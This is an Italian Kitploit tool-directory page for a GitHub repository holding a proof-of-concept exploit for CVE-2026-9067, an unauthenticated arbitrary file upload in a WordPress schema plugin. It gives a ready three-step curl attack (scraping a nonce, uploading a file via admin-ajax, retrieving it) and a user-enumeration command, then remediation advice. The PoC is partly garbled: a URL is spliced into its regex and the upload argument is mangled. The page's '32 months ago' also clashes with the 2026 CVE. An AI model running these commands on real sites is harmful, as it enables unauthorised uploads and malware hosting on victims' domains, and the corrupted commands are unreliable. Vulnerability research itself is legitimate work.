Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
By-Poloss..-..CVE-2026-9067 — Schema & Structured Data per WP & AMP < 1.60 - Caricamento arbitrario di media non autenticato [POC & Xploit] | Kitploit
Strumenti/GitHubGitHub/polosss/by-poloss..-..cve-2026-9067
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubpolosss/by-poloss..-..cve-2026-9067

By-Poloss..-..CVE-2026-9067

Schema & Structured Data per WP & AMP < 1.60 - Caricamento arbitrario di media non autenticato [POC & Xploit]

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
32 mesi faNon ancora revisionato

POC & Xploit - Directory Proof of Concept

Documentazione ed exploit per le vulnerabilità trovate in un ambiente di test di sicurezza WordPress.


Elenco delle vulnerabilità

CVE IDPluginGravitàTipoStato
CVE-2026-9067Schema & Structured Data for WP & AMPAlta (8.1)Caricamento file senza restrizioniDocumentato

CVE-2026-9067

Riepilogo rapido

Descrizione della vulnerabilità

Il plugin Schema & Structured Data for WP & AMP prima della versione 1.60 non convalida le capacità dell'utente negli handler AJAX per il caricamento di file e non convalida il tipo di file caricato. Ciò consente a un attaccante non autenticato di caricare file arbitrari.

Impatto

  • Hosting di contenuti: l'attaccante può ospitare contenuti malevoli sul dominio della vittima
  • Consumo di spazio su disco: il caricamento di file arbitrari può esaurire lo spazio su disco
  • Abuso di reputazione: distribuzione di malware, pagine di phishing dal dominio della vittima

Nota importante: il core di WordPress blocca i file eseguibili (.php, .phtml, .html, .svg), quindi non esiste una via diretta per RCE da questa vulnerabilità.

File

root@kitploit:~
CVE-2026-9067/
├── CVE-2026-9067.md       # Documentazione completa (questo file)
├── CVE-2026-9067.py       # Exploit Python con multi-threading
├── CVE-2026-9067.sh       # Script PoC Bash/Shell
└── CVE-2026-9067_exploit.sh  # PoC Bash alternativo

PoC rapido

root@kitploit:~
# Passo 1: Ottenere il nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Passo 2: Caricare un file arbitrario
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F '[email protected];type=image/png;filename=evil.csv'

# Passo 3: Accedere al file caricato
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"

Informazioni sull'ambiente


Comandi di test

Verifica stato del sito

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site

Verifica versione del plugin

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"

Enumerazione utenti

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'

Rimedio

  1. Aggiornare il plugin: aggiornare Schema & Structured Data for WP & AMP alla versione 1.60 o successiva
  2. Disabilitare il plugin: se l'aggiornamento non è possibile, disabilitare il plugin
  3. Hardening:
    • Impostare la costante DISALLOW_FILE_MODIFICATIONS
    • Disabilitare l'esecuzione PHP nella directory uploads tramite .htaccess
    • Implementare regole WAF

Riferimenti

  • NVD CVE-2026-9067
  • Database vulnerabilità WPScan
  • Pagina del plugin WordPress
  • Ricercatore originale: 0xBassia
Scarica lo strumento
CampoValore
CVE IDCVE-2026-9067
PluginSchema & Structured Data for WP & AMP
Versioni interessate< 1.60
CWECWE-434 (Caricamento senza restrizioni di file con tipo pericoloso)
CVSS v3.18.1 (Alta)
Ricercatore0xBassia
CampoValore
URL di destinazionehttps://yorbit7.ddev.site
Versione PHP8.4
DatabaseMariaDB 11.8
Versione WordPress7.0
Metodo di testbasato su curl (black-box testing)